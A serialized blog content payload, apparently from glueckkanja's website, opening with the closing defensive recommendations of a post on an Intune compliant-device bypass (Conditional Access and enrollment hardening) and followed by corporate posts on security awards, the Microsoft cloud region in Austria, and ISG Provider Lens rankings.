always enforce both!"," Using OR would never restrict all access to compliant device, because an access token with MFA in scope would be sufficient to access the tenant.",[1257,7551,7552,7555],{},[251,7553,7554],{},"Restrict Security Information Registration to Compliant Devices, Phishing Resistant Authentication or TAP."," In our tests we did not manage to bypass Device Compliance for the Security Info Registration.",[1257,7557,7558,7561],{},[251,7559,7560],{},"Require Phishing Resistant Authentication or TAP for Join or Register Devices"," Without it will be possible to register a device with e.g. AADInternals and this technique.",[1257,7563,7564,7567,7568],{},[251,7565,7566],{},"Require MFA and “Sign-in frequency every time” for Microsoft Intune Enrollment"," This limits the timespan an attacker could use fresh credentials to enroll a new device to Intune.\n",[2110,7569,7570],{},[12,7571,7572,7573,7576],{},"🚧\n",[251,7574,7575],{},"Caution: Sign-in frequency every time = Every five minutes","\nMicrosoft factors for five minutes of clock skew when “every time” is selected in a conditional access policy, so that users do not get prompted more often than once every five minutes.",[1257,7578,7579,7582],{},[251,7580,7581],{},"Block personally owned devices in the Intune Enrollment restrictions."," Without these restrictions, an attacker could enroll a new device and gain additional foothold.",[1257,7584,7585,7588],{},[251,7586,7587],{},"Set device compliance to fail when no compliance policy is assigned to a device in Intune."," By default each device is considered compliant, even if no policy is actually applied. Change this and make a device compliance policy a requirement.",[12,7590,7591,7592,1013],{},"In the long run, we would like to encourage you to invest in rollout password-less, phishing-resistant authentication like Windows Hello for Business and Passkeys (incl. Platform Credentials by using macOS Platform SSO). This will allow you to subsequently enforce phishing resistant authentication and block AiTM attacks. Instead of password allow the usage of Temporary Access Pass (TAP) for limited time and scenarios, e.g. onboarding new devices or employees. To support the usage of TAPs for various use cases we have built ",[2672,7593,7596],{"href":7594,"rel":7595},"https://myworkid.cloud/",[2676],"MyWorkID",[41,7598,4287],{"id":4286},[12,7600,31],{},[12,7602,7603],{},"Conditional Access as the Zero Trust engine for Entra ID is, in itself, already complicated. Added built-in exclusions in the backend of Entra by Microsoft make it even harder for many to understand the impact of policies and protections. Still the idea of Zero Trust and defense in depth holds up.",[12,7605,7606],{},"The device compliance policy prevents most AiTM attacks and multi-factor authentication makes it harder for any attacker to abuse leaked or otherwise compromised credentials.",[12,7608,7609],{},"All these security measures must be used together and not one instead of the other. This ensures a secure environment, even if one of the defenses is tampered with or overcome.",[12,7611,7612],{},"We strongly recommend deploying the provided detection in Microsoft Defender XDR to ensure detection of potential abuse. Make sure your SOC is prepared to investigate those incidents and provide them with the necessary playbooks.",{"title":65,"searchDepth":111,"depth":111,"links":7614},[7615,7616,7617,7620,7626,7627,7628,7629],{"id":7016,"depth":111,"text":7017},{"id":7072,"depth":111,"text":7073},{"id":7117,"depth":111,"text":7118,"children":7618},[7619],{"id":7123,"depth":329,"text":7124},{"id":7200,"depth":111,"text":7201,"children":7621},[7622,7623,7624,7625],{"id":7206,"depth":329,"text":7207},{"id":7237,"depth":329,"text":7164},{"id":7270,"depth":329,"text":7175},{"id":7278,"depth":329,"text":7279},{"id":7292,"depth":111,"text":7293},{"id":7451,"depth":111,"text":7452},{"id":7499,"depth":111,"text":7500},{"id":4286,"depth":111,"text":4287},{"lang":2171,"seoTitle":7631,"titleClass":2173,"date":7632,"categories":7633,"blogtitlepic":7634,"socialimg":7635,"customExcerpt":7636,"keywords":7637,"contactInContent":7638,"scripts":7655},"Compliant Device Bypass in Microsoft Intune – Detection, Response & Mitigation","2025-01-14",[2176],"header-company-portal-ca-bypass","/blog/heads/header-company-portal-ca-bypass.png","In this blog post, glueckkanja's MVP Fabian Bader, Chris Brumm and Thomas Naunheim gather details about the Compliant Device Bypass in Microsoft Intune Company Portal. After additional research, they have found an approach to detect and respond to the potential threat. You'll also find guidance on Conditional Access to reduce the attack surface and details on the blast radius.","Compliant Device Bypass, Microsoft Intune, Conditional Access, Entra ID, Intune Company Portal, device compliance, CA exclusion, TokenSmith PoC, cloud security, PowerShell PoC, Fabian Bader, Christopher Brumm, Thomas Naunheim, security threat, Black Hat Europe, Intune Enrollment, MSRC response, attack detection, threat mitigation, cloud compliance, FOCI feature",{"quote":2168,"infos":7639},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":7640,"level":41,"textStyling":2204,"flush":2205,"person":7641,"form":7645},"Would you like to learn more about the Compliant Device Bypass and how to detect and mitigate it effectively? Our experts are ready to walk you through our findings and support you with proven strategies for enhanced security. We look forward to connecting with you!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":7642},[7643,7644],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":7646,"method":2169,"action":2216,"fields":7647},{"skin":2215},[7648,7649,7650,7651,7652,7653,7654],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":6359},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"slick":2181,"form":2181},"/posts/2025-01-14-compliant-device-bypass",{"title":7010,"description":65},"posts/2025-01-14-compliant-device-bypass",[2176,7660,7661,7662],"Entra","Conditional Access","ITDR","h8bIBLTx3L5xSgsiz2-6RK4zsL8vGPfSXh44Gwz7uiw",{"id":7665,"title":7666,"author":7667,"body":7668,"cta":2166,"description":7734,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":7735,"moment":7737,"navigation":2181,"path":7772,"seo":7773,"stem":7774,"tags":7775,"webcast":2168,"__hash__":7776},"content_en/posts/2025-03-04-mssp-2025.md","'23, '24, '25 – the triple is complete!",[2461],{"type":9,"value":7669,"toc":7729},[7670,7676,7680,7682,7689,7691,7695,7697,7700,7703,7714,7717,7721,7723,7726],[12,7671,7672,7675],{},[251,7673,7674],{},"After 2023 and 2024, our success story continues: glueckkanja is once again among the frontrunners of the Microsoft Security Excellence Awards in 2025."," As a leading Managed Security Service Provider (MSSP), we are once again among the top partners recognized by Microsoft for outstanding achievements in cybersecurity. Three consecutive years in this league – that speaks for itself.",[41,7677,7679],{"id":7678},"one-of-the-most-coveted-awards-in-the-industry","One of the most coveted awards in the industry",[12,7681,31],{},[12,7683,7684,7685,7688],{},"The Microsoft Security Excellence Awards are among the most prestigious awards in the IT security industry. Each year, Microsoft honors partners who set new standards in defending against cyber threats. In 2025, glueckkanja is once again among the ",[251,7686,7687],{},"top contenders in the \"Security MSSP of the Year\" category"," – an award given exclusively to the best Managed Security Service Providers.",[5082,7690],{":quotes":5082,":no-fullscreen":3821},[41,7692,7694],{"id":7693},"awarded-three-years-in-a-row-and-this-is-just-the-beginning","Awarded three years in a row – and this is just the beginning",[12,7696,31],{},[12,7698,7699],{},"Our repeated recognition as a leading MSSP is the result of our consistent focus on innovative security solutions and excellent service. glueckkanja combines cutting-edge Microsoft security technologies with deep expertise and a clear goal: to optimally secure companies in an increasingly threatening cyber world. And the direct customer feedback speaks for itself:",[12,7701,7702],{},"Our CSOC Customer Poll shows the outstanding quality of our services:",[1254,7704,7705,7708,7711],{},[1257,7706,7707],{},"87% rate our technical expertise at the highest level",[1257,7709,7710],{},"94% praise our 24/7 coverage",[1257,7712,7713],{},"100% are satisfied with the overall experience",[12,7715,7716],{},"A big thank you to Microsoft and MISA for their trust, valuable partnership, and continuous support. This community of leading security experts is more than a network – it is an ecosystem that sets standards together. A special thanks also to all MISA partners: Your innovations and commitment drive us all forward. Together, we make the digital world safer.",[41,7718,7720],{"id":7719},"_23-24-25-we-set-the-standard-in-microsoft-security","'23, '24, '25 – We set the standard in Microsoft Security",[12,7722,31],{},[12,7724,7725],{},"Awarded three years in a row – this is more than a success, it is a clear sign of excellence. glueckkanja remains at the forefront of the Microsoft security landscape and will continue to set standards with innovative solutions and outstanding service quality.",[12,7727,7728],{},"We look forward to further collaboration with Microsoft, our customers, and partners – and to the next chapter in our success story.",{"title":65,"searchDepth":111,"depth":111,"links":7730},[7731,7732,7733],{"id":7678,"depth":111,"text":7679},{"id":7693,"depth":111,"text":7694},{"id":7719,"depth":111,"text":7720},"After 2023 and 2024, our success story continues: glueckkanja is once again among the frontrunners of the Microsoft Security Excellence Awards in 2025. As a leading Managed Security Service Provider (MSSP), we are once again among the top partners recognized by Microsoft for outstanding achievements in cybersecurity. Three consecutive years in this league – that speaks for itself.",{"lang":2171,"seoTitle":7736,"titleClass":2173,"date":7737,"categories":7738,"blogtitlepic":7739,"socialimg":7740,"customExcerpt":7741,"keywords":7742,"hreflang":7743,"quotes":7748,"contactInContent":7754},"Microsoft Security Excellence Awards: glueckkanja once again finalist as Security MSSP of the Year 2025","2025-03-04",[2962],"head-mssp-finalist-2025","/socialimg/og-img-mssp-2025.png","glueckkanja is once again a finalist at the Security MSSP of the Year Awards, placing us among the world's leading Managed Microsoft Security Providers to be celebrated in April at the RSA Conference in San Francisco. For three consecutive years, our company has been among the top partners in cybersecurity – a success story like no other.","Microsoft Security Excellence Awards 2025, Security MSSP of the Year 2025, Managed Security Service Provider, Cyber Security Microsoft, Microsoft Security Partner, Best Microsoft Security Partner 2025, Microsoft MSSP Finalist 2025, Microsoft Security Award Winner, Cybersecurity Provider with Microsoft Technology, Managed Security for Microsoft 365, Microsoft Intelligent Security Association (MISA) Partner, RSA Conference 2025 San Francisco, Security Excellence Awards Microsoft, MISA Partner Microsoft, Microsoft Security Solutions for Enterprises, Cybersecurity Trends 2025",[7744,7746],{"lang":2260,"href":7745},"/blog/corporate/2025/03/mssp-2025",{"lang":2263,"href":7747},"/blog/corporate/2025/03/mssp-2025-es",{"items":7749},[7750],{"text":7751,"name":7752,"company":7753,"alt":7752},"I’m very pleased to extend my warmest congratulations to this year’s finalists for the Microsoft Security Excellence Awards. These are presented each year to recognize the outstanding achievements of our Microsoft Intelligent Security Association members as they improve customers' ability to identify and respond to security threats. Our community is made up of the most reliable and trusted security vendors worldwide. This year we received hundreds of quality submissions from partners and Microsoft stakeholders, so this year's finalists stood out in a crowd of exceptional talent. It’s my pleasure to acknowledge and celebrate their work over the past year.","Maria Thomson","Director, Microsoft Intelligent Security Association",{"quote":2168,"infos":7755},{"bgColor":6344,"color":5865,"boxBgColor":6345,"boxColor":5863,"headline":5933,"subline":7756,"level":41,"textStyling":2204,"flush":2205,"person":7757,"form":7761},"As a leading Microsoft Security MSSP, we protect companies from cyber threats every day. Let´s talk and strengthen your cyber defenses together!",{"image":5936,"cloudinary":2181,"alt":5937,"name":5937,"detailsHeader":5269,"details":7758},[7759,7760],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":5281,"cta":7762,"method":2169,"action":2216,"fields":7763},{"skin":2215},[7764,7765,7766,7767,7768,7770,7771],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":2236,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2247,"value":7769},"Form: Blog MSSP 2025 | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},"/posts/2025-03-04-mssp-2025",{"title":7666,"description":7734},"posts/2025-03-04-mssp-2025",[2972,2971,2176,5113],"YY4vTqUIXYJ2s54Iixe-3J7kVLd0ls7auz0GdWgMduw",{"id":7778,"title":7779,"author":7780,"body":7781,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":7857,"moment":7859,"navigation":2181,"path":7899,"seo":7900,"stem":7901,"tags":7902,"webcast":2168,"__hash__":7906},"content_en/posts/2025-03-12-azure-goes-austria.md","Hello Clöud",[2535],{"type":9,"value":7782,"toc":7853},[7783,7787,7789,7792,7818,7821,7825,7827,7830,7850],[41,7784,7786],{"id":7785},"a-cloud-region-that-changes-everything","A Cloud Region That Changes Everything!",[12,7788,31],{},[12,7790,7791],{},"Now there is an answer to all these challenges: Microsoft is building its own cloud region in Austria with state-of-the-art data centers and maximum performance. This means for you: You now get the global power of a public cloud with the security of local data storage!",[1254,7793,7794,7800,7806,7812],{},[1257,7795,7796,7799],{},[251,7797,7798],{},"Maximum Performance:"," lower latency, higher scalability, more efficiency",[1257,7801,7802,7805],{},[251,7803,7804],{},"Local Data Storage:"," all data stays in Austria – secure, compliant, and protected",[1257,7807,7808,7811],{},[251,7809,7810],{},"Increased Security & Resilience:"," state-of-the-art infrastructure with multiple layers of security",[1257,7813,7814,7817],{},[251,7815,7816],{},"Sustainable IT:"," up to 93% more energy-efficient than traditional data centers",[12,7819,7820],{},"But a cloud region alone is not enough – the right partner makes the difference. This is where we at glueckkanja come into play.",[41,7822,7824],{"id":7823},"we-get-you-ready-for-the-local-future-of-your-it","We Get You Ready for the Local Future of Your IT!",[12,7826,31],{},[12,7828,7829],{},"In Germany, we are among the leading Microsoft partners for cloud migration. Now our expertise is also available in the new Microsoft Cloud Region Austria. As a strategic partner, we now seamlessly bring your company into the cloud. Do you have questions about data protection, system migration, or available financial benefits? We are here for you and accompany you from the first steps to the final go-live (and gladly beyond). Your benefits:",[1254,7831,7832,7838,7844],{},[1257,7833,7834,7837],{},[251,7835,7836],{},"Blueprint & Landing Zone Deployment:"," We enable you to migrate securely, quickly, and smoothly!",[1257,7839,7840,7843],{},[251,7841,7842],{},"AMM Funding:"," We provide comprehensive information about Microsoft funding for a cost-efficient transition!",[1257,7845,7846,7849],{},[251,7847,7848],{},"Seamless Transition:"," We accompany you step by step into the new AT-Cloud with standardized solutions!",[12,7851,7852],{},"Benefit now from our experience of over 100 successful cloud migrations and our top-notch Microsoft expertise.",{"title":65,"searchDepth":111,"depth":111,"links":7854},[7855,7856],{"id":7785,"depth":111,"text":7786},{"id":7823,"depth":111,"text":7824},{"lang":2171,"seoTitle":7858,"titleClass":2173,"date":7859,"categories":7860,"blogtitlepic":7861,"socialimg":7862,"customExcerpt":7863,"keywords":7864,"contactInContent":7865,"hreflang":7893,"scripts":7898,"published":2181},"Microsoft Cloud Region Austria: Local Cloud Power for Your Business","2025-03-12",[4232],"head-azure-goes-austria","/blog/heads/head-azure-goes-austria.png","Austrian companies are currently at a turning point. Digitalization is accelerating rapidly. At the same time, the demands on IT security, speed, and flexibility are increasing – and so are the challenges related to costs, regulatory hurdles, and the use of new technologies.","Microsoft Cloud Region Austria, Cloud Migration Austria, local data storage, Cloud Security, Microsoft Partner Austria, Cloud Performance, sustainable IT, Cloud Solutions Austria, Azure Migration, Landing Zone Deployment",{"quote":2181,"infos":7866},{"bgColor":2201,"headline":7867,"subline":7868,"level":41,"textStyling":2204,"flush":2205,"person":7869,"form":7876},"Get in Touch Now!","Do you want to learn more about how we can seamlessly and securely bring your company into the new Microsoft Cloud Region Austria? We are happy to personally present our offer, answer your questions about data protection and migration, and guide you step by step on your way to the cloud. Secure your personal consultation now!",{"image":7870,"cloudinary":2181,"alt":2535,"name":2535,"quotee":2535,"quoteeTitle":7871,"quote":7872,"detailsHeader":5269,"details":7873},"/people/people-florian-stoeckl.jpg","Azure Lead","The new Microsoft Cloud Region Austria is a real game-changer: Local data storage combined with global cloud power – an unbeatable mix for security, performance, and innovation. With our many years of expertise, we ensure that Austrian companies can now make the most of this opportunity.",[7874,7875],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5266,"href":6190,"icon":5279},{"ctaText":2213,"cta":7877,"method":2169,"action":2216,"fields":7878},{"skin":2215},[7879,7880,7881,7882,7884,7886,7887,7889,7891,7892],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":5811,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":7883,"type":2232,"id":2233,"required":2181,"requiredMsg":2234},"Your Message to Us*",{"label":7885,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored with us for processing and answering your request. For more information on data protection, please see our \u003Ca href=\"/de/datenschutz\">privacy policy\u003C/a>.",{"type":2241,"id":2242,"value":4232},{"type":2241,"id":2244,"value":7888},"AT",{"type":2241,"id":2247,"value":7890},"Form: Blog Hello Clöud | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},[7894,7896],{"lang":2260,"href":7895},"/blog/azure/2025/03/azure-goes-austria",{"lang":2263,"href":7897},"/blog/azure/2025/03/azure-goes-austria-es",{"slick":2181},"/posts/2025-03-12-azure-goes-austria",{"title":7779,"description":65},"posts/2025-03-12-azure-goes-austria",[4232,7903,7904,7905],"Cloud Migration","IT Infrastructure","Austria","TH18HrbdSmsHS28hv_2t0xudYJtx4K8Na_IKCnyvKfo",{"id":7908,"title":7909,"author":7910,"body":7911,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":7966,"moment":7967,"navigation":2181,"path":7977,"seo":7978,"stem":7979,"tags":7980,"webcast":2168,"__hash__":7981},"content_en/posts/2025-04-29-rsa-mssp-2025.md","glueckkanja remains among the Top 5 MSSPs worldwide",[2461],{"type":9,"value":7912,"toc":7962},[7913,7917,7919,7922,7925,7928,7931,7941,7944,7947,7950,7954,7956,7959],[41,7914,7916],{"id":7915},"three-years-in-a-row-glueckkanja-among-the-security-elite","Three Years in a Row: glueckkanja Among the Security Elite",[12,7918,31],{},[12,7920,7921],{},"For the third year in a row, we’re ranked among the world’s top five Managed Microsoft Security Providers. A triple win we're absolutely thrilled about. CEO Christian Kanja and Head of Security Jan Geisbauer were in San Francisco to celebrate the award together with the Microsoft Intelligent Security Association (MISA) and the international security community. RSA, Golden Gate Bridge, red carpet – it was all there.",[12,7923,7924],{},"And because innovation doesn’t just happen on stage, Christian and Jan took a ride into the future: cruising through the streets of San Francisco in a self-driving taxi. No driver, but tons of excitement – a perfect match for the spirit of RSA.\nThat's exactly what we aim for in cybersecurity too: trust is built when systems deliver what they promise.",[12,7926,7927],{},"The Microsoft Security Excellence Awards are among the most prestigious in the industry. They honor partners who set standards with innovation and service quality. Being recognized again in 2025 as one of the top Managed Security Service Providers is a special milestone for us – and a huge endorsement of our team’s daily work.",[12,7929,7930],{},"What brought us here:",[1254,7932,7933,7936,7939],{},[1257,7934,7935],{},"87% of our customers rate our technical expertise at the highest level",[1257,7937,7938],{},"94% praise our 24/7 services",[1257,7940,7713],{},[12,7942,7943],{},"Strong results that show: as a team, we’re achieving extraordinary things.",[12,7945,7946],{},"A huge thank-you to everyone who made this success possible – to Microsoft and the Microsoft Intelligent Security Association (MISA) for their close partnership and trust, to our customers for their loyalty, and to our CSOC team, who deliver outstanding work day in and day out.",[12,7948,7949],{},"In a strong security community, the best minds work together – and that collaboration keeps pushing us forward.",[41,7951,7953],{"id":7952},"looking-ahead","Looking Ahead",[12,7955,31],{},[12,7957,7958],{},"This award is both motivation and commitment for us. We're staying on it: with innovation, passion, and the drive to deliver Microsoft security solutions at the highest level. Together with Microsoft, our customers, and our partners, we're writing the next chapter of our success story.",[12,7960,7961],{},"glueckkanja – Champions League-level security.",{"title":65,"searchDepth":111,"depth":111,"links":7963},[7964,7965],{"id":7915,"depth":111,"text":7916},{"id":7952,"depth":111,"text":7953},{"lang":2171,"seoTitle":7909,"titleClass":2173,"date":7967,"categories":7968,"blogtitlepic":7969,"socialimg":7740,"customExcerpt":7970,"keywords":7742,"hreflang":7971,"scripts":7976},"2025-04-29",[2962],"head-rsa-2025","The Microsoft Security Excellence Awards are among the most prestigious honors in the industry. At RSA Conference 2025 in San Francisco, partners were once again recognized for setting standards through innovation, service quality, and dedication. We're absolutely thrilled that glueckkanja has once again been named a finalist for the 'Security MSSP of the Year Awards' in 2025 – a huge acknowledgment of the hard work our entire team puts in every single day.",[7972,7974],{"lang":2260,"href":7973},"/blog/corporate/202504/rsa-mssp-2025",{"lang":2263,"href":7975},"/blog/corporate/2025/04/rsa-mssp-2025-es",{"slick":2181},"/posts/2025-04-29-rsa-mssp-2025",{"title":7909,"description":65},"posts/2025-04-29-rsa-mssp-2025",[2972,2971,2176,5113],"ys69x_mwOAPW-TJbu7gOqW7VZPvgxmCwQJtdHBizh4w",{"id":7983,"title":7984,"author":7985,"body":7986,"cta":2166,"description":7990,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":8077,"moment":8079,"navigation":2181,"path":8132,"seo":8133,"stem":8134,"tags":8135,"webcast":2168,"__hash__":8136},"content_en/posts/2025-05-08-isg-germany-2025.md","Four in a row. glueckkanja once again a Leader in ISG",[2461],{"type":9,"value":7987,"toc":8070},[7988,7991,7994,7998,8000,8003,8007,8009,8014,8019,8023,8025,8030,8035,8039,8041,8046,8051,8055,8057,8062,8067],[12,7989,7990],{},"They say once is nothing. Twice is nice. But with a third time, you’re officially on the map. By that logic, we’ve now become a permanent fixture in the ISG Provider Lens™ study: After being named a Leader in 2021, 2023, and 2024, glueckkanja once again earns the title in 2025 – in both Microsoft 365 Services and Managed Azure.",[12,7992,7993],{},"As a long-standing Microsoft partner, we help companies around the globe move to the cloud – strategically, securely, and always with a clear sense of what’s feasible. In doing so, we contribute to global IT security and help drive innovation across a wide range of industries. We’re proud that the ISG study continues to recognize these efforts.",[41,7995,7997],{"id":7996},"isg-provider-lens-study-2025","ISG Provider Lens™ Study 2025",[12,7999,31],{},[12,8001,8002],{},"With its \"Microsoft Cloud Ecosystem\" study, ISG offers valuable insights through its Provider Lens™ series to help organizations align their strategies – from positioning and partnerships to go-to-market approaches. Providers are evaluated based on their portfolio and competitive strength in the Microsoft Cloud ecosystem, and then mapped across four quadrants: Product Challenger, Contender, Market Challenger, and Leader. But enough about the framework – let’s talk about how we performed.",[41,8004,8006],{"id":8005},"glueckkanja-is-leader-microsoft-365-services-midmarket","glueckkanja is Leader Microsoft 365 Services (Midmarket)",[12,8008,31],{},[12,8010,8011],{},[2642,8012],{"alt":5465,"src":8013},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-midmarket.png",[12,8015,8016],{},[3456,8017,8018],{},"\"glueckkanja is driving cloud transformation, efficiently integrating Microsoft 365 and Windows 365, and leveraging automation to streamline IT processes and ensure security!\"",[41,8020,8022],{"id":8021},"glueckkanja-is-leader-microsoft-365-services-large-accounts","glueckkanja is Leader Microsoft 365 Services (Large Accounts)",[12,8024,31],{},[12,8026,8027],{},[2642,8028],{"alt":5416,"src":8029},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-large-accounts.png",[12,8031,8032],{},[3456,8033,8034],{},"\"glueckkanja optimizes complex IT environments, seamlessly integrates Microsoft 365 and Windows 365, and uses automation for maximum scalability, security, and efficiency.\"",[41,8036,8038],{"id":8037},"glueckkanja-is-leader-managed-services-for-azure-midmarket","glueckkanja is Leader Managed Services for Azure (Midmarket)",[12,8040,31],{},[12,8042,8043],{},[2642,8044],{"alt":5381,"src":8045},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-midmarket.png",[12,8047,8048],{},[3456,8049,8050],{},"\"glueckkanja delivers secure, scalable cloud infrastructures that reduce risk and increase efficiency. Thanks to automation and forward-thinking governance, businesses gain stability, control, and future-readiness.\"",[41,8052,8054],{"id":8053},"glueckkanja-is-leader-managed-services-for-azure-large-accounts","glueckkanja is Leader Managed Services for Azure (Large Accounts)",[12,8056,31],{},[12,8058,8059],{},[2642,8060],{"alt":5336,"src":8061},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-large-accounts.png",[12,8063,8064],{},[3456,8065,8066],{},"\"glueckkanja is shaping the future of the cloud with automation, governance, and sustainability. Infrastructure as Code and iterative optimization create resilient, scalable, and cost-efficient solutions.\"",[12,8068,8069],{},"At this point, we’d just like to say a big thank you for all the recognition. If you're curious to dive deeper into the study results, just let us know – we’ll be happy to send you the full ISG summary.",{"title":65,"searchDepth":111,"depth":111,"links":8071},[8072,8073,8074,8075,8076],{"id":7996,"depth":111,"text":7997},{"id":8005,"depth":111,"text":8006},{"id":8021,"depth":111,"text":8022},{"id":8037,"depth":111,"text":8038},{"id":8053,"depth":111,"text":8054},{"lang":2171,"seoTitle":8078,"titleClass":2173,"date":8079,"categories":8080,"blogtitlepic":8081,"socialimg":8082,"customExcerpt":8083,"keywords":8084,"hreflang":8085,"footer":8090,"contactInContent":8091,"textImageTeaser":8120},"ISG 2025: glueckkanja again named Leader for Managed Services for Azure and Microsoft 365 Services","2025-05-08",[2962],"head-isg-2025.png","/blog/heads/head-isg-2025.png","The ISG Provider Lens™ 2025 study once again recognizes glueckkanja as a Leader in both Managed Services for Azure and Microsoft 365 Services. Awarded in both segments – Midmarket and Large Accounts – this confirms what has become increasingly clear over the past years: When it comes to standardization, automation, and scale for Microsoft environments, glueckkanja is the go-to partner.","Microsoft partner Germany, Managed Services Azure Germany, Microsoft 365 Services Germany, IT service provider Germany, Cloud services Germany, ISG Provider Lens Germany, glueckkanja Germany, Microsoft cloud Germany, ISG Leader 2025, IT security Germany, digital transformation Germany, Azure services Germany, Microsoft 365 consulting Germany, glueckkanja, glueckkanja Microsoft services, ISG award Microsoft",[8086,8088],{"lang":2260,"href":8087},"/blog/corporate/2025/05/isg-germany-2025",{"lang":2263,"href":8089},"/blog/corporate/2025/05/isg-germany-2025-es",{"noMargin":2181},{"quote":2181,"infos":8092},{"bgColor":2201,"headline":8093,"subline":8094,"level":41,"textStyling":2204,"flush":2205,"person":8095,"form":8103},"Request the study","Want to take a deeper look at the study results? Just reach out – we’ll send you the full ISG summary, including our skills and strengths.",{"image":8096,"cloudinary":2181,"alt":2415,"name":2415,"quotee":2415,"quoteeTitle":8097,"quote":8098,"detailsHeader":8099,"details":8100},"/people/people-michael-breither.jpg","COO","Being recognized by ISG once again validates our approach: standardized, scalable services for Microsoft platforms – with real added value for our customers.","We look forward\u003Cbr />to hearing from you!",[8101,8102],{"text":5272,"href":5273,"details":5274,"icon":5275},{"text":5266,"href":6190,"icon":5279},{"ctaText":2213,"cta":8104,"method":2169,"action":2216,"fields":8105},{"skin":2215},[8106,8107,8108,8109,8111,8113,8114,8116,8118,8119],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},"Your message to us",{"label":8112,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},"Your data will be stored and used to respond to your request. For more information on how we handle your data, please see our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.",{"type":2241,"id":2242,"value":2962},{"type":2241,"id":2244,"value":8115},"DE",{"type":2241,"id":2247,"value":8117},"Form: Blog ISG Germany | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"image":8121,"cloudinary":2181,"alt":8122,"bgColor":8123,"offset":2168,"list":8124,"left":2168,"float":2168,"firstColWidth":650,"secondColWidth":662,"copyClasses":8128,"headline":8129,"subline":8130,"spacing":8131},"/logos/isg-provider-lens-rising-star-ch.png","ISG Provider Lens","#fcd116",[8125],{"ctaText":8126,"ctaHref":8127,"ctaType":6003},"More info","/en/blog/corporate/2025/05/isg-switzerland-2025","richtext","\u003Cp>By the way, we’re a Rising Star in Switzerland!\u003Cbr />Merci, ISG!\u003C/p>","\u003Cp>Get the full scoop on our ISG results in Switzerland.\u003C/p>","space-top-2 space-bottom-2","/posts/2025-05-08-isg-germany-2025",{"title":7984,"description":7990},"posts/2025-05-08-isg-germany-2025",[2972,4401],"JgmVJq1h3hHtkdCxfyhUeMcaIzj-9b35VOq35fkeZ_E",{"id":8138,"title":8139,"author":8140,"body":8141,"cta":2166,"description":8145,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":8198,"moment":8079,"navigation":2181,"path":8244,"seo":8245,"stem":8246,"tags":8247,"webcast":2168,"__hash__":8248},"content_en/posts/2025-05-08-isg-switzerland-2025.md","Switzerland steps up. glueckkanja becomes ISG Rising Star",[2461],{"type":9,"value":8142,"toc":8193},[8143,8146,8149,8151,8153,8156,8160,8162,8168,8173,8177,8179,8185,8190],[12,8144,8145],{},"Bern is known for its stunning old town, the Zytglogge, the Federal Palace – and of course, the rose garden. Now there’s a new highlight: glueckkanja Switzerland has been named a \"Rising Star\" in the latest ISG Provider Lens™ study – recognized for our Microsoft 365 Services and Managed Services for Azure.",[12,8147,8148],{},"We’ve had boots on the ground in Bern since 2024. From here, as an experienced Microsoft partner, we help Swiss companies move to the cloud – strategically, securely, and always with a realistic view of what’s doable. In just twelve months, we’ve made a meaningful contribution to IT security in the Swiss business landscape and driven innovation across a variety of industries. Which makes it all the more rewarding to see our efforts now recognized by the ISG Provider Lens™.",[41,8150,7997],{"id":7996},[12,8152,31],{},[12,8154,8155],{},"The \"Microsoft Cloud Ecosystem\" study is part of ISG’s Provider Lens™ series, offering deep insights to help companies refine their strategic direction – from positioning and partnerships to go-to-market strategies. Providers are assessed based on their product portfolio and competitive strength in the Microsoft cloud ecosystem, and positioned in four quadrants: Product Challenger, Contender, Market Challenger, and Leader. That’s the theory – now let’s look at our results!",[41,8157,8159],{"id":8158},"glueckkanja-is-rising-star-microsoft-365-services","glueckkanja is Rising Star Microsoft 365 Services",[12,8161,31],{},[12,8163,8164],{},[2642,8165],{"alt":8166,"src":8167},"Microsoft 365 Services","https://res.cloudinary.com/c4a8/image/upload/blog/pics/Microsoft_365_Services.png",[12,8169,8170],{},[3456,8171,8172],{},"\"glueckkanja supports Swiss companies in secure cloud transformation, integrates Microsoft 365 and Windows 365, and streamlines IT processes through automation and 